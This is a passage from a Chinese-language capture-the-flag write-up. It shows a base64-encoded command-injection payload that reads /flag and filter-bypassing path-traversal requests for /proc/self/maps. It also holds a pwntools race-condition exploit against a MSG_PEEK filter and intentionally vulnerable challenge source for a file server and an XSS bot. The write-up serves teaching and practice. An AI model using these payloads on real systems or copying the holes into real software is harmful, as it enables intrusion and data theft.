ip_base64\u662f\uff0c\u5148\u901a\u8fc7Python\u7684base64\u5e93\u89e3\u7801\u6821\u9a8c\u4e4b\u540e\uff0c\u518d\u7ecf\u8fc7Linux\u7684\u547d\u4ee4\u884c\u89e3\u7801\uff0c\u800c\u5728Python\u4e2dbase64.b64decode\u4e0d\u4f1a\u5bf9=<\/code>\u4e4b\u540e\u7684\u5185\u5bb9\u7ee7\u7eed\u89e3\u7801\uff0c\u4e5f\u5c31\u662f\u53ef\u4ee5\u901a\u8fc7\u4e24\u7aef\u7f16\u7801\u6765\u7ed5\u8fc7<\/p>\n\n\n\n0.0.0.0;cat \/flag<\/p>\n\n\n\n
MC4wLjAuMA==O2NhdCAvZmxhZw==<\/code><\/pre>\n\n\n\n\u62ff\u5230flag<\/p>\n\n\n\n
Peek a Fork<\/h4>\n\n\n\n
\u626b\u5230\/entrypoint.sh<\/p>\n\n\n\n
#!\/bin\/sh\nset -e\n\necho \"$FLAG\" > \/app\/flag.txt\n\nunset FLAG\n\nexec python \/app\/server.py<\/code><\/pre>\n\n\n\n\u8bfbserver.py\u8bfb\u5230\u6e90\u7801<\/p>\n\n\n\n
import socket\nimport os\nimport hashlib\nimport fcntl\nimport re\nimport mmap\n\nwith open('flag.txt', 'rb') as f:\n flag = f.read()\nmm = mmap.mmap(-1, len(flag))\nmm.write(flag)\nos.remove('flag.txt')\n\nFORBIDDEN = [b'flag', b'proc', b'<', b'>', b'^', b\"'\", b'\"', b'..', b'.\/']\nPAGE = \"\"\"<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>Secure Gateway<\/title>\n <style>\n body { font-family: 'Courier New', monospace; background-color: #0c0c0c; color: #00ff00; text-align: center; margin-top: 10%; }\n .container { border: 1px solid #00ff00; padding: 2rem; display: inline-block; }\n h1 { font-size: 2.5rem; text-shadow: 0 0 5px #00ff00; }\n p { font-size: 1.2rem; }\n .status { color: #ffff00; }\n <\/style>\n<\/head>\n<body>\n <div class=\"container\">\n <h1>Firewall<\/h1>\n <p class=\"status\">STATUS: All systems operational.<\/p>\n <p>Your connection has been inspected.<\/p>\n <\/div>\n<\/body>\n<\/html>\"\"\"\n\ndef handle_connection(conn, addr, log, factor=1):\n try:\n conn.settimeout(10.0)\n\n if log:\n with open('log.txt', 'a') as f:\n fcntl.flock(f, fcntl.LOCK_EX)\n log_bytes = f\"{addr[0]}:{str(addr[1])}:{str(conn)}\".encode()\n for _ in range(factor):\n log_bytes = hashlib.sha3_256(log_bytes).digest()\n log_entry = log_bytes.hex() + \"n\"\n f.write(log_entry)\n\n request_data = conn.recv(256)\n if not request_data.startswith(b\"GET \/\"):\n response = b\"HTTP\/1.1 400 Bad RequestrnrnInvalid Request\"\n conn.sendall(response)\n return\n try:\n path = request_data.split(b' ')[1]\n pattern = rb'?offset=(d+)&length=(d+)'\n\n offset = 0\n length = -1\n\n match = re.search(pattern, path)\n\n if match:\n offset = int(match.group(1).decode())\n length = int(match.group(2).decode())\n\n clean_path = re.sub(pattern, b'', path)\n filename = clean_path.strip(b'\/').decode()\n else:\n filename = path.strip(b'\/').decode()\n\n except Exception:\n response = b\"HTTP\/1.1 400 Bad RequestrnrnInvalid Request\"\n conn.sendall(response)\n return\n\n if not filename:\n response_body = PAGE\n response_status = \"200 OK\"\n else:\n try:\n with open(os.path.normpath(filename), 'rb') as f:\n if offset > 0:\n f.seek(offset)\n\n data_bytes = f.read(length)\n response_body = data_bytes.decode('utf-8', 'ignore')\n response_status = \"200 OK\"\n except Exception as e:\n response_body = f\"Invalid path\"\n response_status = \"500 Internal Server Error\"\n\n response = f\"HTTP\/1.1 {response_status}rnContent-Length: {len(response_body)}rnrn{response_body}\"\n conn.sendall(response.encode())\n\n except Exception:\n pass\n finally:\n conn.close()\n os._exit(0)\n\ndef main():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind(('0.0.0.0', 1337))\n server.listen(50)\n print(f\"Server listening on port 1337...\")\n\n while True:\n try:\n pid, status = os.waitpid(-1, os.WNOHANG)\n except ChildProcessError:\n pass\n conn, addr = server.accept()\n\n initial_data = conn.recv(256, socket.MSG_PEEK)\n if any(term in initial_data.lower() for term in FORBIDDEN):\n conn.sendall(b\"HTTP\/1.1 403 ForbiddenrnrnSuspicious request pattern detected.\")\n conn.close()\n continue\n\n if initial_data.startswith(b'GET \/?log=1'):\n try:\n factor = 1\n pattern = rb\"&factor=(d+)\"\n match = re.search(pattern, initial_data)\n if match:\n factor = int(match.group(1).decode())\n pid = os.fork()\n if pid == 0:\n server.close()\n handle_connection(conn, addr, True, factor)\n except Exception as e:\n print(\"[ERROR]: \", e)\n finally:\n conn.close()\n continue\n else:\n pid = os.fork()\n if pid == 0:\n server.close()\n handle_connection(conn, addr, False)\n\n conn.close()\n\nif __name__ == '__main__':\n main()<\/code><\/pre>\n\n\n\n\u5728\u628aflag\u8bfb\u5230\u5185\u5b58\u4e4b\u540e\u76f4\u63a5\u5220\u4e86\uff0c\u4e5f\u5c31\u662f\u9700\u8981\u53bb\u5185\u5b58proc\/self\/mem\u91cc\u9762\u627e<\/p>\n\n\n\n
\u975e\u9884\u671f<\/h5>\n\n\n\npattern = rb'?offset=(d+)&length=(d+)'\n\nclean_path = re.sub(pattern, b'', path)<\/code><\/pre>\n\n\n\n\u4ec5\u4ec5\u5c06\u4e0d\u5408\u6cd5\u7684\u5185\u5bb9\u66ff\u6362\u6210\u7a7a<\/p>\n\n\n\n
\u628a?offset=(d+)&length=(d+)\u76f4\u63a5\u63d2\u5728\/..\/proc\/self\/environ\u88ab\u8fc7\u6ee4\u7684..\u548cproc\u4e2d\u95f4\u5c31\u884c\u4e86<\/p>\n\n\n\n
GET \/.?offset=0&length=100000.?offset=0&length=10000\/pr?offset=0&length=100000oc\/self\/maps HTTP\/1.1\nHost: hostlocal:17309<\/code><\/pre>\n\n\n\n![\"image-20260111203148997\"](\"https:\/\/bucketqiao123456.oss-cn-beijing.aliyuncs.com\/image-20260111203148997.png\")
<\/figure>\n\n\n\n56395827e000-56395827f000 r--p 00000000 103:00 15523385 \/usr\/local\/bin\/python3.12\n56395827f000-563958280000 r-xp 00001000 103:00 15523385 \/usr\/local\/bin\/python3.12\n563958280000-563958281000 r--p 00002000 103:00 15523385 \/usr\/local\/bin\/python3.12\n563958281000-563958282000 r--p 00002000 103:00 15523385 \/usr\/local\/bin\/python3.12\n563958282000-563958283000 rw-p 00003000 103:00 15523385 \/usr\/local\/bin\/python3.12\n563959f5f000-56395a3b0000 rw-p 00000000 00:00 0 [heap]\n7fa2fe996000-7fa2fe998000 r--p 00000000 103:00 15524156 \/usr\/local\/lib\/python3.12\/lib-dynload\/mmap.cpython-312-x86_64-linux-gnu.so\n7fa2fe998000-7fa2fe99b000 r-xp 00002000 103:00 15524156 \/usr\/local\/lib\/python3.12\/lib-dynload\/mmap.cpython-312-x86_64-linux-gnu.so\n7fa2fe99b000-7fa2fe99d000 r--p 00005000 103:00 15524156 \/usr\/local\/lib\/python3.12\/lib-dynload\/mmap.cpython-312-x86_64-linux-gnu.so\n7fa2fe99d000-7fa2fe99e000 r--p 00006000 103:00 15524156 \/usr\/local\/lib\/python3.12\/lib-dynload\/mmap.cpython-312-x86_64-linux-gnu.so\n7fa2fe99e000-7fa2fe99f000 rw-p 00007000 103:00 15524156 \/usr\/local\/lib\/python3.12\/lib-dynload\/mmap.cpython-312-x86_64-linux-gnu.so\n7fa2fe99f000-7fa2fe9a0000 r--p 00000000 103:00 15524153 \/usr\/local\/lib\/python3.12\/lib-dynload\/fcntl.cpython-312-x86_64-linux-gnu.so\n7fa2fe9a0000-7fa2fe9a2000 r-xp 00001000 103:00 15524153 \/usr\/local\/lib\/python3.12\/lib-dynload\/fcntl.cpython-312-x86_64-linux-gnu.so\n7fa2fe9a2000-7fa2fe9a4000 r--p 00003000 103:00 15524153 \/usr\/local\/lib\/python3.12\/lib-dynload\/fcntl.cpython-312-x86_64-linux-gnu.so\n7fa2fe9a4000-7fa2fe9a5000 r--p 00004000 103:00 15524153 \/usr\/local\/lib\/python3.12\/lib-dynload\/fcntl.cpython-312-x86_64-linux-gnu.so\n7fa2fe9a5000-7fa2fe9a6000 rw-p 00005000 103:00 15524153 \/usr\/local\/lib\/python3.12\/lib-dynload\/fcntl.cpython-312-x86_64-linux-gnu.so\n7fa2fe9a6000-7fa2fe9a8000 r--p 00000000 103:00 15524094 \/usr\/local\/lib\/python3.12\/lib-dynload\/_blake2.cpython-312-x86_64-linux-gnu.so\n7fa2fe9a8000-7fa2fe9af000 r-xp 00002000 103:00 15524094 \/usr\/local\/lib\/python3.12\/lib-dynload\/_blake2.cpython-312-x86_64-linux-gnu.so\n7fa2fe9af000-7fa2fe9b1000 r--p 00009000 103:00 15524094 \/usr\/local\/lib\/python3.12\/lib-dynload\/_blake2.cpython-312-x86_64-linux-gnu.so\n7fa2fe9b1000-7fa2fe9b2000 r--p 0000a000 103:00 15524094 \/usr\/local\/lib\/python3.12\/lib-dynload\/_blake2.cpython-312-x86_64-linux-gnu.so\n7fa2fe9b2000-7fa2fe9b3000 rw-p 0000b000 103:00 15524094 \/usr\/local\/lib\/python3.12\/lib-dynload\/_blake2.cpython-312-x86_64-linux-gnu.so\n7fa2fe9b3000-7fa2fe9b8000 r--p 00000000 103:00 15520405 \/usr\/lib\/x86_64-linux-gnu\/libzstd.so.1.5.7\n7fa2fe9b8000-7fa2fea67000 r-xp 00005000 103:00 15520405 \/usr\/lib\/x86_64-linux-gnu\/libzstd.so.1.5.7\n7fa2fea67000-7fa2fea7b000 r--p 000b4000 103:00 15520405 \/usr\/lib\/x86_64-linux-gnu\/libzstd.so.1.5.7\n7fa2fea7b000-7fa2fea7c000 r--p 000c8000 103:00 15520405 \/usr\/lib\/x86_64-linux-gnu\/libzstd.so.1.5.7\n7fa2fea7c000-7fa2fea7d000 rw-p 000c9000 103:00 15520405 \/usr\/lib\/x86_64-linux-gnu\/libzstd.so.1.5.7\n7fa2fea7d000-7fa2fea80000 r--p 00000000 103:00 15520403 \/usr\/lib\/x86_64-linux-gnu\/libz.so.1.3.1\n7fa2fea80000-7fa2fea94000 r-xp 00003000 103:00 15520403 \/usr\/lib\/x86_64-linux-gnu\/libz.so.1.3.1\n7fa2fea94000-7fa2fea9b000 r--p 00017000 103:00 15520403 \/usr\/lib\/x86_64-linux-gnu\/libz.so.1.3.1\n7fa2fea9b000-7fa2fea9c000 r--p 0001d000 103:00 15520403 \/usr\/lib\/x86_64-linux-gnu\/libz.so.1.3.1\n7fa2fea9c000-7fa2fea9d000 rw-p 0001e000 103:00 15520403 \/usr\/lib\/x86_64-linux-gnu\/libz.so.1.3.1\n7fa2fea9d000-7fa2feb94000 r--p 00000000 103:00 15520163 \/usr\/lib\/x86_64-linux-gnu\/libcrypto.so.3\n7fa2feb94000-7fa2fef15000 r-xp 000f7000 103:00 15520163 \/usr\/lib\/x86_64-linux-gnu\/libcrypto.so.3\n7fa2fef15000-7fa2ff04c000 r--p 00478000 103:00 15520163 \/usr\/lib\/x86_64-linux-gnu\/libcrypto.so.3\n7fa2ff04c000-7fa2ff0cf000 r--p 005ae000 103:00 15520163 \/usr\/lib\/x86_64-linux-gnu\/libcrypto.so.3\n7fa2ff0cf000-7fa2ff0d2000 rw-p 00631000 103:00 15520163 \/usr\/lib\/x86_64-linux-gnu\/libcrypto.so.3\n7fa2ff0d2000-7fa2ff0d5000 rw-p 00000000 00:00 0 \n7fa2ff0d5000-7fa2ff0d9000 r--p 00000000 103:00 15524114 \/usr\/local\/lib\/python3.12\/lib-dynload\/_hashlib.cpython-312-x86_64-linux-gnu.so\n7fa2ff0d9000-7fa2ff0df000 r-xp 00004000 103:00 15524114 \/usr\/local\/lib\/python3.12\/lib-dynload\/_hashlib.cpython-312-x86_64-linux-gnu.so\n7fa2ff0df000-7fa2ff0e3000 r--p 0000a000 103:00 15524114 \/usr\/local\/lib\/python3.12\/lib-dynload\/_hashlib.cpython-312-x86_64-linux-gnu.so\n7fa2ff0e3000-7fa2ff0e4000 r--p 0000d000 103:00 15524114 \/usr\/local\/lib\/python3.12\/lib-dynload\/_hashlib.cpython-312-x86_64-linux-gnu.so\n7fa2ff0e4000-7fa2ff0e6000 rw-p 0000e000 103:00 15524114 \/usr\/local\/lib\/python3.12\/lib-dynload\/_hashlib.cpython-312-x86_64-linux-gnu.so\n7fa2ff0e6000-7fa2ff0ea000 r--p 00000000 103:00 15524149 \/usr\/local\/lib\/python3.12\/lib-dynload\/array.cpython-312-x86_64-linux-gnu.so\n7fa2ff0ea000-7fa2ff0f1000 r-xp 00004000 103:00 15524149 \/usr\/local\/lib\/python3.12\/lib-dynload\/array.cpython-312-x86_64-linux-gnu.so\n7fa2ff0f1000-7fa2ff0f5000 r--p 0000b000 103:00 15524149 \/usr\/local\/lib\/python3.12\/lib-dynload\/array.cpython-312-x86_64-linux-gnu.so\n7fa2ff0f5000-7fa2ff0f6000 r--p 0000f000 103:00 15524149 \/usr\/local\/lib\/python3.12\/lib-dynload\/array.cpython-312-x86_64-linux-gnu.so\n7fa2ff0f6000-7fa2ff0f7000 rw-p 00010000 103:00 15524149 \/usr\/local\/lib\/python3.12\/lib-dynload\/array.cpython-312-x86_64-linux-gnu.so\n7fa2ff0f7000-7fa2ff1f7000 rw-p 00000000 00:00 0 \n7fa2ff1f7000-7fa2ff1f9000 r--p 00000000 103:00 15524161 \/usr\/local\/lib\/python3.12\/lib-dynload\/select.cpython-312-x86_64-linux-gnu.so\n7fa2ff1f9000-7fa2ff1fc000 r-xp 00002000 103:00 15524161 \/usr\/local\/lib\/python3.12\/lib-dynload\/select.cpython-312-x86_64-linux-gnu.so\n7fa2ff1fc000-7fa2ff1fe000 r--p 00005000 103:00 15524161 \/usr\/local\/lib\/python3.12\/lib-dynload\/select.cpython-312-x86_64-linux-gnu.so\n7fa2ff1fe000-7fa2ff1ff000 r--p 00006000 103:00 15524161 \/usr\/local\/lib\/python3.12\/lib-dynload\/select.cpython-312-x86_64-linux-gnu.so\n7fa2ff1ff000-7fa2ff200000 rw-p 00007000 103:00 15524161 \/usr\/local\/lib\/python3.12\/lib-dynload\/select.cpython-312-x86_64-linux-gnu.so\n7fa2ff200000-7fa2ff300000 rw-p 00000000 00:00 0 \n7fa2ff300000-7fa2ff304000 r--p 00000000 103:00 15524131 \/usr\/local\/lib\/python3.12\/lib-dynload\/_socket.cpython-312-x86_64-linux-gnu.so\n7fa2ff304000-7fa2ff30f000 r-xp 00004000 103:00 15524131 \/usr\/local\/lib\/python3.12\/lib-dynload\/_socket.cpython-312-x86_64-linux-gnu.so\n7fa2ff30f000-7fa2ff318000 r--p 0000f000 103:00 15524131 \/usr\/local\/lib\/python3.12\/lib-dynload\/_socket.cpython-312-x86_64-linux-gnu.so\n7fa2ff318000-7fa2ff319000 r--p 00017000 103:00 15524131 \/usr\/local\/lib\/python3.12\/lib-dynload\/_socket.cpython-312-x86_64-linux-gnu.so\n7fa2ff319000-7fa2ff31a000 rw-p 00018000 103:00 15524131 \/usr\/local\/lib\/python3.12\/lib-dynload\/_socket.cpython-312-x86_64-linux-gnu.so\n7fa2ff31a000-7fa2ff51a000 rw-p 00000000 00:00 0 \n7fa2ff51a000-7fa2ff52b000 r--p 00000000 103:00 15520236 \/usr\/lib\/x86_64-linux-gnu\/libm.so.6\n7fa2ff52b000-7fa2ff5a8000 r-xp 00011000 103:00 15520236 \/usr\/lib\/x86_64-linux-gnu\/libm.so.6\n7fa2ff5a8000-7fa2ff608000 r--p 0008e000 103:00 15520236 \/usr\/lib\/x86_64-linux-gnu\/libm.so.6\n7fa2ff608000-7fa2ff609000 r--p 000ed000 103:00 15520236 \/usr\/lib\/x86_64-linux-gnu\/libm.so.6\n7fa2ff609000-7fa2ff60a000 rw-p 000ee000 103:00 15520236 \/usr\/lib\/x86_64-linux-gnu\/libm.so.6\n7fa2ff60a000-7fa2ff632000 r--p 00000000 103:00 15520148 \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n7fa2ff632000-7fa2ff797000 r-xp 00028000 103:00 15520148 \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n7fa2ff797000-7fa2ff7ed000 r--p 0018d000 103:00 15520148 \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n7fa2ff7ed000-7fa2ff7f1000 r--p 001e2000 103:00 15520148 \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n7fa2ff7f1000-7fa2ff7f3000 rw-p 001e6000 103:00 15520148 \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n7fa2ff7f3000-7fa2ff800000 rw-p 00000000 00:00 0 \n7fa2ff800000-7fa2ff900000 r--p 00000000 103:00 15523607 \/usr\/local\/lib\/libpython3.12.so.1.0\n7fa2ff900000-7fa2ffb1f000 r-xp 00100000 103:00 15523607 \/usr\/local\/lib\/libpython3.12.so.1.0\n7fa2ffb1f000-7fa2ffc6f000 r--p 0031f000 103:00 15523607 \/usr\/local\/lib\/libpython3.12.so.1.0\n7fa2ffc6f000-7fa2ffce6000 r--p 0046e000 103:00 15523607 \/usr\/local\/lib\/libpython3.12.so.1.0\n7fa2ffce6000-7fa2ffe55000 rw-p 004e5000 103:00 15523607 \/usr\/local\/lib\/libpython3.12.so.1.0\n7fa2ffe55000-7fa2ffe56000 rw-p 00000000 00:00 0 \n7fa2ffe5c000-7fa2ffe5f000 r--p 00000000 103:00 15524155 \/usr\/local\/lib\/python3.12\/lib-dynload\/math.cpython-312-x86_64-linux-gnu.so\n7fa2ffe5f000-7fa2ffe67000 r-xp 00003000 103:00 15524155 \/usr\/local\/lib\/python3.12\/lib-dynload\/math.cpython-312-x86_64-linux-gnu.so\n7fa2ffe67000-7fa2ffe6c000 r--p 0000b000 103:00 15524155 \/usr\/local\/lib\/python3.12\/lib-dynload\/math.cpython-312-x86_64-linux-gnu.so\n7fa2ffe6c000-7fa2ffe6d000 r--p 0000f000 103:00 15524155 \/usr\/local\/lib\/python3.12\/lib-dynload\/math.cpython-312-x86_64-linux-gnu.so\n7fa2ffe6d000-7fa2ffe6e000 rw-p 00010000 103:00 15524155 \/usr\/local\/lib\/python3.12\/lib-dynload\/math.cpython-312-x86_64-linux-gnu.so\n7fa2ffe6e000-7fa2ffed4000 rw-p 00000000 00:00 0 \n7fa2ffed4000-7fa2ffedb000 r--s 00000000 103:00 15520059 \/usr\/lib\/x86_64-linux-gnu\/gconv\/gconv-modules.cache\n7fa2ffedb000-7fa2fff35000 r--p 00000000 103:00 15519696 \/usr\/lib\/locale\/C.utf8\/LC_CTYPE\n7fa2fff35000-7fa2fff37000 rw-p 00000000 00:00 0 \n7fa2fff38000-7fa2fff39000 rw-s 00000000 00:01 6174 \/dev\/zero (deleted)\n7fa2fff39000-7fa2fff3b000 rw-p 00000000 00:00 0 \n7fa2fff3b000-7fa2fff3c000 r--p 00000000 103:00 15520122 \/usr\/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2\n7fa2fff3c000-7fa2fff64000 r-xp 00001000 103:00 15520122 \/usr\/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2\n7fa2fff64000-7fa2fff6f000 r--p 00029000 103:00 15520122 \/usr\/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2\n7fa2fff6f000-7fa2fff71000 r--p 00034000 103:00 15520122 \/usr\/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2\n7fa2fff71000-7fa2fff72000 rw-p 00036000 103:00 15520122 \/usr\/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2\n7fa2fff72000-7fa2fff73000 rw-p 00000000 00:00 0 \n7ffe68e9d000-7ffe68ebe000 rw-p 00000000 00:00 0 [stack]\n7ffe68ec9000-7ffe68ecd000 r--p 00000000 00:00 0 [vvar]\n7ffe68ecd000-7ffe68ecf000 r-xp 00000000 00:00 0 [vdso]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]<\/code><\/pre>\n\n\n\n\u6211\u4eec\u4e0d\u77e5\u9053 Flag \u5b58\u653e\u5728\u5185\u5b58\u7684\u54ea\u4e2a\u7edd\u5bf9\u5730\u5740\u3002 \u5c31\u9700\u8981\u627e\u6743\u9650\u4e3a\u53ef\u8bfb\u5199 rw-p\u4e14\u6ca1\u6709\u5173\u8054\u6587\u4ef6\u540d\u7684\u5185\u5b58\u6bb5<\/p>\n\n\n\n
\u7528\u811a\u672c\u7b97\u504f\u79fb\u548c\u957f\u5ea6\uff0c\u4ece\u5341\u516d\u8fdb\u5236\u5230\u5341\u8fdb\u5236<\/p>\n\n\n\n
import re\n\nmaps=open('maps')\nb = maps.read()\nlist = b.split('n')\nfor line in list:\n if 'rw' in line:\n addr = re.search('([0-9a-f]+)-([0-9a-f]+)',line)\n #\u6b63\u5219\u5339\u914d\u5730\u5740,\u5730\u5740\u683c\u5f0f\u4e3a\u5341\u516d\u8fdb\u5236\u6570[0-9a-f],reserch\u4f1a\u8fd4\u56de\u4e00\u4e2are.Match\u5bf9\u8c61\uff0c\u7528\u62ec\u53f7\u62ec\u8d77\u6765\u662f\u4e3a\u4e86\u4f7f\u7528group()\u5904\u7406\u8fd4\u56de\u7ed3\u679c\u3002\n start = int(addr.group(1),16) #\u5c06\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u8f6c\u5316\u4e3a\u5341\u8fdb\u5236\u6570\uff0c\u4e3a\u4e86\u7b26\u5408start\u53c2\u6570\u683c\u5f0f\u53c2\u8003\u94fe\u63a5\n end = int(addr.group(2),16) #\u5c06\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u8f6c\u5316\u4e3a\u5341\u8fdb\u5236\u6570\uff0c\u4e3a\u4e86\u7b26\u5408end\u53c2\u6570\u683c\u5f0f\n print(start,end)\n print(end-start)<\/code><\/pre>\n\n\n\n\u56e0\u4e3a\u4e0d\u6e05\u695a\u5728\u54ea\u4e00\u6bb5\u91cc\u9762\u4e8e\u662f\u6bcf\u4e2a\u90fd\u7b97\u51fa\u6765\u624b\u52a8\u8bd5\u4e86<\/p>\n\n\n\n![\"image-20260111203517430\"](\"https:\/\/bucketqiao123456.oss-cn-beijing.aliyuncs.com\/image-20260111203517430.png\")
<\/figure>\n\n\n\n\u6700\u540e\u4e5f\u662f\u53ef\u4ee5\u770b\u5230\u662f\u5728 \/usr\/local\/lib\/python3.12\/lib-dynload\/select.cpython-312-x86_64-linux-gnu.so \u8fd9\u4e00\u6bb5\u91cc\u9762<\/p>\n\n\n\n
\u9884\u671f<\/h5>\n\n\n\n
\u4ee3\u7801\u91cc\u8fdb\u884c\u4e86\u4e24\u6b21 recv\uff0c\u4e0e waf \u76f8\u5173\u7684\u662f\u8fd9\u4e00\u6bb5<\/p>\n\n\n\n
initial_data = conn.recv(256, socket.MSG_PEEK)\nif any(term in initial_data.lower() for term in FORBIDDEN):\n conn.sendall(b\"HTTP\/1.1 403 ForbiddenrnrnSuspicious request pattern detected.\")\n conn.close()\n continue<\/code><\/pre>\n\n\n\n\u91cc\u9762\u7528\u4e86MSG_PEEK\uff0c\u53ea\u662f\u67e5\u770b\u6570\u636e\uff0c\u800c\u4e0d\u53d6\u8d70\u6570\u636e<\/p>\n\n\n\n
\u4e5f\u5c31\u662f\u8bf4\u6570\u636e\u4f1a\u7559\u5728\u7f13\u51b2\u533a\uff0c\u800c\u6b63\u5f0f\u8bfb\u5165\u662f\u5728 handle_connection\uff0c\u4e00\u65e6\u8bfb\u53d6\u5219\u4f1a\u628a\u6570\u636e\u79fb\u9664\u7f13\u51b2\u533a<\/p>\n\n\n\n
\u5728\u8bfb\u5165\u524d\uff0c\u5982\u679c\u8fdb\u4e86log\uff0c\u4f1a\u4f18\u5148\u8fdb\u884c log \u518d\u8bfb\u5165\uff0c\u800c\u5982\u679c\u8fd9\u91cc factor \u7684\u503c\u7ed9\u9ad8\u4e86\u4f1a\u8ba1\u7b97\u4e00\u4f1a\u54c8\u5e0c\u503c\uff0c\u5361\u5728\u8fd9\u91cc\u4e00\u6bb5\u65f6\u95f4\uff0c\u90a3\u4e48\u7f13\u51b2\u533a\u4e2d\u5c31\u4f1a\u6301\u7eed\u5b58\u5728 GET \/?log=1&factor=100000\uff0c\u6b64\u65f6\u5982\u679c\u5728\u901a\u8fc7 MSG_PEEK \u540e\u7f13\u51b2\u533a\u8fd8\u672a\u6e05\u9664\u4e4b\u524d\u7acb\u523b\u63d2\u5165\u518d\u4f20\u5165\uff0c\u56e0\u4e3a\u8fdb\u7a0b\u5df2\u7ecf\u8fc7\u4e86waf\u73af\u8282\uff0c\u4e8e\u662f\u65b0\u4f20\u5165\u7684 \/..\/..\/..\/proc\/self\/maps\u5c31\u4f1a\u8df3\u8fc7waf\u68c0\u6d4b\u76f4\u63a5\u63a5\u5728\u540e\u9762 \uff0c\u90a3\u4e48\u5b9e\u9645\u8fdb\u5165\u7f13\u51b2\u533a\u5185\u4e3a GET \/?log=1&factor=100000\/..\/..\/..\/proc\/self\/maps<\/p>\n\n\n\n
from pwn import *\n\nhost = 'localhost'\nport = 1337\n\nremote1 = remote(host, port)\nremote1.send(b'GET \/?log=1&factor=100000')\ntime.sleep(0.01)\nremote1.send(f'\/..\/..\/..\/..\/proc\/self\/maps'.encode())\nresp = remote1.recv()\nprint(resp)<\/code><\/pre>\n\n\n\n\u6765\u8fd9\u6837\u7ed5\u8fc7waf\u8bfb\u5230maps\uff0c\u7136\u540e\u5c31\u662f\u6b63\u5e38\u6d41\u7a0b\u4e86<\/p>\n\n\n\n
Unfinished<\/h4>\n\n\n\n
xss<\/p>\n\n\n\n
from flask import Flask, request, render_template, redirect, url_for, flash, render_template_string, make_response\nfrom flask_login import LoginManager, UserMixin, login_user, logout_user, current_user, login_required\nimport requests\nfrom markupsafe import escape\nfrom playwright.sync_api import sync_playwright\nimport os\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'your-secret-key-here'\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'login'\n\nclass User(UserMixin):\n def __init__(self, id, username, password, bio=\"\"):\n self.id = id\n self.username = username\n self.password = password\n self.bio = bio\nadmin_password = os.urandom(12).hex()\n\nUSERS_DB = {'admin': User(id=1, username='admin', password=admin_password)}\nUSER_ID_COUNTER = 1\n\n@login_manager.user_loader\ndef load_user(user_id):\n for user in USERS_DB.values():\n if str(user.id) == user_id:\n return user\n return None\n\n@app.route('\/')\ndef index():\n return render_template('index.html')\n\n@app.route('\/register', methods=['GET', 'POST'])\ndef register():\n global USER_ID_COUNTER\n if request.method == 'POST':\n username = request.form['username']\n if username in USERS_DB:\n flash('Username already exists.')\n return redirect(url_for('register'))\n\n USER_ID_COUNTER += 1\n new_user = User(\n id=USER_ID_COUNTER,\n username=username,\n password=request.form['password']\n )\n USERS_DB[username] = new_user\n login_user(new_user)\n response = make_response(redirect(url_for('index')))\n response.set_cookie('ticket', 'your_ticket_value')\n return response\n return render_template('register.html')\n\n@app.route('\/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n user = USERS_DB.get(username)\n if user and user.password == password:\n login_user(user)\n return redirect(url_for('index'))\n flash('Invalid credentials.')\n return render_template('login.html')\n\n@app.route('\/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n@app.route('\/profile', methods=['GET', 'POST'])\n@login_required\ndef profile():\n if request.method == 'POST':\n current_user.bio = request.form['bio']\n print(current_user.bio)\n return redirect(url_for('index'))\n return render_template('profile.html')\n\n@app.route('\/ticket', methods=['GET', 'POST'])\ndef ticket():\n if request.method == 'POST':\n ticket = request.form['ticket']\n response = make_response(redirect(url_for('index')))\n response.set_cookie('ticket', ticket)\n return response\n return render_template('ticket.html')\n\n@app.route(\"\/view\", methods=[\"GET\"])\n@login_required\ndef view_user():\n \"\"\"\n # I found a bug in it.\n # Until I fix it, I've banned \/api\/bio\/. Have fun :)\n \"\"\"\n username = request.args.get(\"username\",default=current_user.username)\n visit_url(f\"http:\/\/localhost\/api\/bio\/{username}\")\n template = f\"\"\"\n {{% extends \"base.html\" %}}\n {{% block title %}}success{{% endblock %}}\n {{% block content %}}\n <h1>bot will visit your bio<\/h1>\n <p style=\"margin-top: 1.5rem;\"><a href=\"{{{{ url_for('index') }}}}\">Back to Home<\/a><\/p>\n {{% endblock %}}\n \"\"\"\n return render_template_string(template)\n\n\n@app.route(\"\/api\/bio\/<string:username>\", methods=[\"GET\"])\n@login_required\ndef get_user_bio(username):\n if not current_user.username == username:\n return \"Unauthorized\", 401\n user = USERS_DB.get(username)\n if not user:\n return \"User not found.\", 404\n return user.bio\n\ndef visit_url(url):\n try:\n flag_value = os.environ.get('FLAG', 'flag{fake}')\n\n with sync_playwright() as p:\n browser = p.chromium.launch(headless=True, args=[\"--no-sandbox\"])\n context = browser.new_context()\n\n context.add_cookies([{\n 'name': 'flag',\n 'value': flag_value,\n 'domain': 'localhost',\n 'path': '\/',\n 'httponly': True\n }])\n\n page = context.new_page()\n page.goto(\"http:\/\/localhost\/login\", timeout=5000)\n page.fill(\"input[name='username']\", \"admin\")\n page.fill(\"input[name='password']\", admin_password)\n page.click(\"input[name='submit']\")\n page.wait_for_timeout(3000)\n page.goto(url, timeout=5000)\n page.wait_for_timeout(5000)\n browser.close()\n\n except Exception as e:\n print(f\"Bot error: {str(e)}\")\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)<\/code><\/pre>\n\n\n\nuser www-data;\nworker_processes auto;\npid \/var\/run\/nginx.pid;\n\nevents {\n 